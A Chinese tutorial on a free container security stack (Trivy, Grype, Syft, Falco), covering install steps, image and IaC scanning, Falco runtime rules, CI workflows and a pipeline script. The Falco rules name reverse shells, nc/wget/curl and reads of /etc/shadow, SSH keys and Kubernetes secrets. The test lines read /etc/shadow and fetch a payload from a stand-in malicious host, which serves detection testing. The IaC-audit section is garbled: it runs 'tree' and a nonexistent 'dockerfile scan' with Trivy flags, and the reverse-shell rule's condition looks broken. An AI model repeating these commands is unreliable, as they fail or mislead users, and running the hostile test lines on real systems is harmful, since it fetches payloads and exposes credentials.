Trivy+Falco:开源容器安全扫描与运行时检测方案
容器安全是云原生时代的必修课。商业方案动辄上万美金:Snyk Container $25/月/开发者起、Aqua Security $7,000+/年、Prisma Cloud (Palo Alto) $10,000+/年。本文用Trivy+Falco+Grype搭建完整的免费容器安全扫描与运行时威胁检测方案,覆盖镜像漏洞扫描、配置审计、运行时异常行为检测全流程。
一、付费容器安全工具定价对比
| 工具 | 定价模式 | 入门价格 | 企业级价格 | 核心优势 |
|---|---|---|---|---|
| Snyk Container | 按开发者/月 | $25/月/开发者 | $50,000+/年 | 漏洞修复建议、IDE集成、供应链安全 |
| Aqua Security | 按节点/镜像数 | $7,000+/年 | $30,000+/年 | 全生命周期容器安全、供应链安全 |
| Prisma Cloud | 按用量计费 | $10,000+/年 | $80,000+/年 | CNAPP、CSPM、CWPP一体化、合规管理 |
二、免费替代方案介绍
Trivy
Trivy是Aqua Security开源的全能安全扫描器,支持容器镜像、文件系统、Git仓库、Kubernetes集群、IaC配置等多种扫描目标。扫描速度快是其最大优势,单个镜像扫描通常在30秒内完成。Trivy支持CVE、misconfig、secret、license等多种扫描类型。GitHub: https://github.com/aquasecurity/trivy
Falco
Falco是CNCF毕业项目,专注于容器和Kubernetes的运行时威胁检测。它通过监控Linux系统调用(syscall)来检测异常行为,如异常进程执行、敏感文件访问、网络连接等。Falco使用eBPF技术,对系统性能影响极小。GitHub: https://github.com/falcosecurity/falco
Grype
Grype是Anchore开源的漏洞扫描工具,专注于容器镜像和文件系统的SBOM(软件物料清单)生成与漏洞匹配。与Trivy互补,提供更详细的漏洞匹配结果。GitHub: https://github.com/anchore/grype
Clair
Clair是Quay.io团队开发的容器镜像漏洞扫描器,是最早的开源容器安全工具之一。适合已有Quay Registry的团队集成使用。GitHub: https://github.com/quay/clair
三、完整安装步骤
3.1 环境准备
系统要求:Linux(Ubuntu 20.04+/Debian 11+),2GB+ RAM,Docker或containerd运行时,Kubernetes集群(可选)
# 更新系统
sudo apt update && sudo apt upgrade -y
# 确认Docker版本
docker --version
# Docker version 24.x+ 推荐
# 确认内核版本(Falco需要5.x+内核以支持eBPF)
uname -r
3.2 安装Trivy
# 方法1:官方安装脚本(推荐)
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
# 方法2:APT仓库安装
sudo apt-get install -y wget apt-transport-https gnupg lsb-release
wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | gpg --dearmor | sudo tee /usr/share/keyrings/trivy.gpg > /dev/null
echo "deb [signed-by=/usr/share/keyrings/trivy.gpg] https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/trivy.list
sudo apt-get update
sudo apt-get install -y trivy
# 验证安装
trivy --version
# trivy version 0.48.x+
3.3 安装Grype
# 安装Grype
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
# 验证
grype --version
3.4 安装Falco
Falco支持三种驱动模式:eBPF(推荐)、kernel module、modern eBPF(实验性)。推荐使用eBPF模式:
# 方法1:使用Falco官方安装脚本
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | sudo gpg --dearmor -o /usr/share/keyrings/falco-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/falco-archive-keyring.gpg] https://download.falco.org/packages/deb stable main" | sudo tee /etc/apt/sources.list.d/falcosecurity.list
sudo apt-get update
sudo apt-get install -y falco
# 方法2:Helm安装(Kubernetes环境)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
# 安装Falco到Kubernetes
helm install falco falcosecurity/falco \
--namespace falco --create-namespace \
--set falcosidekick.enabled=true \
--set driver.kind=ebpf
# 验证Falco状态
sudo systemctl status falco
# 或Kubernetes环境
kubectl get pods -n falco
3.5 安装Syft(SBOM生成工具,配合Grype使用)
# 安装Syft
curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
# 验证
syft --version
四、配置示例
4.1 Trivy镜像漏洞扫描
# 基本漏洞扫描
trivy image nginx:latest
# 只显示HIGH和CRITICAL级别
trivy image --severity HIGH,CRITICAL nginx:latest
# 输出JSON格式(便于自动化)
trivy image -f json -o result.json nginx:latest
# 扫描并设置退出码(CI/CD集成)
trivy image --exit-code 1 --severity CRITICAL nginx:latest
# 扫描本地镜像(不从registry拉取)
trivy image --input myapp.tar
# 扫描Kubernetes集群所有镜像
trivy k8s --report summary cluster
4.2 Trivy IaC配置审计
# 扫描Dockerfile
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
dockerfile scan myproject/Dockerfile
# 使用trivy扫描Dockerfile
tree myproject/Dockerfile myproject/ --misconfig-scanners dockerfile
# 扫描Terraform/IaC文件
tree myproject/terraform/ --misconfig-scanners terraform
# 扫描Kubernetes YAML清单
tree myproject/k8s/ --misconfig-scanners yaml
# 扫描Helm Chart
tree myproject/helm-chart/ --misconfig-scanners helm
# 自定义检查策略
tree myproject/ --misconfig-scanners dockerfile,terraform,yaml \
--policy-bundle-repository https://example.com/custom-policies
4.3 Grype + Syft深度扫描
# 生成SBOM(软件物料清单)
syft nginx:latest -o json > sbom.json
# 用Grype基于SBOM扫描漏洞
grype sbom:sbom.json
# 直接扫描镜像
grype nginx:latest
# 只输出CRITICAL级别
grype nginx:latest --only-fixed --fail-on critical
# 输出SARIF格式(GitHub Security集成)
grype nginx:latest -o sarif > results.sarif
# CI/CD管道集成:有CRITICAL漏洞则失败
grype nginx:latest --fail-on critical --only-fixed
4.4 Falco运行时检测配置
Falco的规则文件位于 /etc/falco/falco_rules.yaml,编辑自定义规则:
# /etc/falco/falco_rules.local.yaml
# 自定义规则:检测容器内反向Shell
- rule: Reverse Shell in Container
desc: Detect reverse shell activity in container
condition: >
spawned_process and container and
((proc.name = bash or proc.name = sh or proc.name = nc or proc.name = ncat) and
(fd.type = ipv4 or fd.type = ipv6) and
(fd.name startswith "<client>" or fd.name startswith "127.0.0.1"))
output: >
Reverse shell detected in container
(user=%user.name container=%container.name command=%proc.cmdline connection=%fd.name)
priority: CRITICAL
tags: [container, network, mitre_execution]
# 检测容器内执行的可疑命令
- rule: Suspicious Command in Container
desc: Detect common attack tools executed in container
condition: >
spawned_process and container and
(proc.name in (nmap, netcat, nc, curl, wget, python, perl, ruby) and
not proc.pname in (shellcheck, shfmt))
output: >
Suspicious command executed in container
(user=%user.name container=%container.name command=%proc.cmdline parent=%proc.pname)
priority: WARNING
tags: [container, execution, mitre_execution]
# 检测敏感文件访问
- rule: Sensitive File Access in Container
desc: Detect access to sensitive files like /etc/shadow
condition: >
open_read and container and
(fd.name startswith /etc/shadow or fd.name startswith /etc/passwd or
fd.name startswith /root/.ssh or fd.name startswith /var/run/secrets)
output: >
Sensitive file accessed in container
(user=%user.name file=%fd.name container=%container.name command=%proc.cmdline)
priority: WARNING
tags: [container, file, mitre_credential_access]
# 检测容器逃逸尝试
- rule: Container Escape Attempt
desc: Detect mount or nsenter to host namespace
condition: >
spawned_process and container and
((proc.name = mount and proc.args startswith "/host") or
(proc.name = nsenter) or
(proc.name = chroot))
output: >
Container escape attempt detected
(user=%user.name container=%container.name command=%proc.cmdline)
priority: CRITICAL
tags: [container, escape, mitre_privilege_escalation]
重启Falco使规则生效:
# 系统安装
sudo systemctl restart falco
# 验证Falco正在运行
sudo journalctl -u falco -f
# 测试规则:在容器中执行一条命令
docker run --rm alpine sh -c "cat /etc/shadow"
# 应该在Falco日志中看到告警
4.5 Falco告警输出配置
编辑 /etc/falco/falco.yaml 配置告警输出:
# 输出到stdout(默认)
json_output: true
json_include_output_property: true
# 输出到文件
file_output:
enabled: true
keep_alive: false
filename: /var/log/falco/alerts.json
# 输出到Syslog
syslog_output:
enabled: true
host: ""
port: ""
program: "falco"
# 输出到HTTP(集成Slack/飞书等)
http_output:
enabled: true
url: "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
user_agent: "falco"
insecure: false
# 输出到Kafka
kafka_output:
enabled: true
brokers: "kafka:9092"
topic: "falco-alerts"
4.6 GitHub Actions CI/CD集成
在项目中添加 .github/workflows/container-security.yml:
name: Container Security Scan
on:
push:
branches: [main]
pull_request:
branches: [main]
jobs:
trivy-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Build Docker image
run: docker build -t myapp:${{ github.sha }} .
- name: Trivy vulnerability scan
uses: aquasecurity/trivy-action@master
with:
image-ref: myapp:${{ github.sha }}
format: table
exit-code: 1
severity: CRITICAL
ignore-unfixed: true
- name: Trivy SBOM generation
uses: aquasecurity/trivy-action@master
with:
image-ref: myapp:${{ github.sha }}
format: cyclonedx
output: sbom.json
- name: Grype vulnerability scan
uses: anchore/scan-action@v3
with:
image: myapp:${{ github.sha }}
fail-build: true
severity-cutoff: critical
- name: Trivy config scan
uses: aquasecurity/trivy-action@master
with:
scan-type: config
scan-ref: .
severity: HIGH,CRITICAL
五、功能对比表
| 功能 | Snyk Container | Aqua Security | Trivy + Falco | 差距说明 |
|---|---|---|---|---|
| 镜像漏洞扫描 | ✅ 优秀 | ✅ 优秀 | ✅ Trivy极快 | Trivy扫描速度领先 |
| 运行时检测 | ⚠️ 有限 | ✅ 行为分析 | ✅ Falco eBPF | Falco系统调用级检测 |
| SBOM生成 | ✅ | ✅ | ✅ Syft/Trivy | 基本持平 |
| IaC配置审计 | ✅ | ✅ | ✅ Trivy内置 | Trivy支持Dockerfile/Terraform/K8s |
| Kubernetes安全 | ✅ | ✅ 增强 | ⚠️ 基本 | 缺少集群级别的策略管理 |
| 供应链安全 | ✅ Snyk Advisor | ✅ 供应链分析 | ⚠️ 有限 | 最大差距:缺少依赖关系分析 |
| 合规管理 | ⚠️ 基本 | ✅ CIS/NIST | ⚠️ 需手动配置 | 缺少自动化合规报告 |
| Web界面 | ✅ 完善 | ✅ 企业级 | ❌ CLI为主 | 缺少集中管理界面 |
| CI/CD集成 | ✅ 广泛 | ✅ 广泛 | ✅ GitHub/GitLab | 基本持平 |
| 多运行时支持 | ⚠️ 有限 | ✅ Docker/containerd/CRI-O | ✅ Falco eBPF | Falco内核级监控 |
| 成本 | $25/月/开发者起 | $7,000+/年 | $0(开源) | 核心优势 |
六、实战场景:完整的容器安全扫描流水线
将Trivy、Grype、Falco组合成完整的安全扫描流水线:
#!/bin/bash
# container-security-pipeline.sh
# 完整的容器安全扫描流水线
IMAGE=$1
REPORT_DIR="./security-reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p $REPORT_DIR
echo "[1/5] Trivy漏洞扫描..."
trivy image -f json -o $REPORT_DIR/trivy-vuln.json --severity HIGH,CRITICAL $IMAGE
TRIVY_CRITICAL=$(cat $REPORT_DIR/trivy-vuln.json | python3 -c "import sys,json; d=json.load(sys.stdin); print(len([v for r in d.get('Results',[]) for v in r.get('Vulnerabilities',[]) if v.get('Severity')=='CRITICAL']))")
echo "发现 $TRIVY_CRITICAL 个CRITICAL漏洞"
echo "[2/5] Trivy配置审计..."
trivy config -f json -o $REPORT_DIR/trivy-misconfig.json ./
echo "配置扫描完成"
echo "[3/5] Syft SBOM生成..."
syft $IMAGE -o cyclonedx-json > $REPORT_DIR/sbom.json
COMPONENTS=$(cat $REPORT_DIR/sbom.json | python3 -c "import sys,json; d=json.load(sys.stdin); print(len(d.get('components',[])))")
echo "发现 $COMPONENTS 个组件"
echo "[4/5] Grype漏洞扫描..."
grype sbom:$REPORT_DIR/sbom.json -o json > $REPORT_DIR/grype-vuln.json
GRYPE_CRITICAL=$(cat $REPORT_DIR/grype-vuln.json | python3 -c "import sys,json; d=json.load(sys.stdin); print(len([m for m in d.get('matches',[]) if m.get('vulnerability',{}).get('severity')=='Critical']))")
echo "发现 $GRYPE_CRITICAL 个CRITICAL漏洞(Grype)"
echo "[5/5] 生成综合报告..."
cat > $REPORT_DIR/summary.txt << EOF
=== 容器安全扫描报告 ===
镜像: $IMAGE
时间: $(date)
Trivy CRITICAL漏洞: $TRIVY_CRITICAL
Grype CRITICAL漏洞: $GRYPE_CRITICAL
SBOM组件数: $COMPONENTS
报告目录: $REPORT_DIR
EOF
cat $REPORT_DIR/summary.txt
# 如有CRITICAL漏洞则返回失败
if [ $TRIVY_CRITICAL -gt 0 ] || [ $GRYPE_CRITICAL -gt 0 ]; then
echo "存在CRITICAL漏洞,构建失败!"
exit 1
fi
echo "安全扫描通过!"
使用方式:
chmod +x container-security-pipeline.sh
docker build -t myapp:v1 .
./container-security-pipeline.sh myapp:v1
七、Kubernetes集群级安全监控部署
在Kubernetes中同时部署Trivy Operator和Falco:
# 安装Trivy Operator(自动扫描集群中所有镜像)
helm repo add aquasecurity https://aquasecurity.github.io/helm-charts
helm install trivy-operator aquasecurity/trivy-operator \
--namespace trivy-system --create-namespace
# 查看集群漏洞报告
kubectl get vulnerabilityreports -A
# 查看配置审计报告
kubectl get configauditreports -A
# 安装Falco
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | sudo gpg --dearmor -o /usr/share/keyrings/falco-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/falco-archive-keyring.gpg] https://download.falco.org/packages/deb stable main" | sudo tee /etc/apt/sources.list.d/falcosecurity.list
sudo apt-get update
sudo apt-get install -y falco
# 验证Falco告警
docker run --rm alpine sh -c "wget http://malicious.example.com/payload"
# Falco日志中应出现告警
八、总结
Trivy+Falco+Grype的组合覆盖了容器安全的三大关键环节:镜像构建时扫描(Trivy/Grype)、运行时威胁检测(Falco)、供应链透明度(Syft/SBOM)。主要不足是缺少商业方案的供应链安全深度分析、自动化合规管理和Web管理界面。
建议的落地路径:1)先在CI/CD中集成Trivy,阻断含高危漏洞的镜像进入生产环境;2)在所有Kubernetes节点部署Falco,监控运行时异常行为;3)用Trivy Operator持续监控集群漏洞态势;4)生成SBOM并与Grype联动,建立漏洞响应流程。这套方案零成本即可覆盖大部分中小团队的容器安全需求。
评论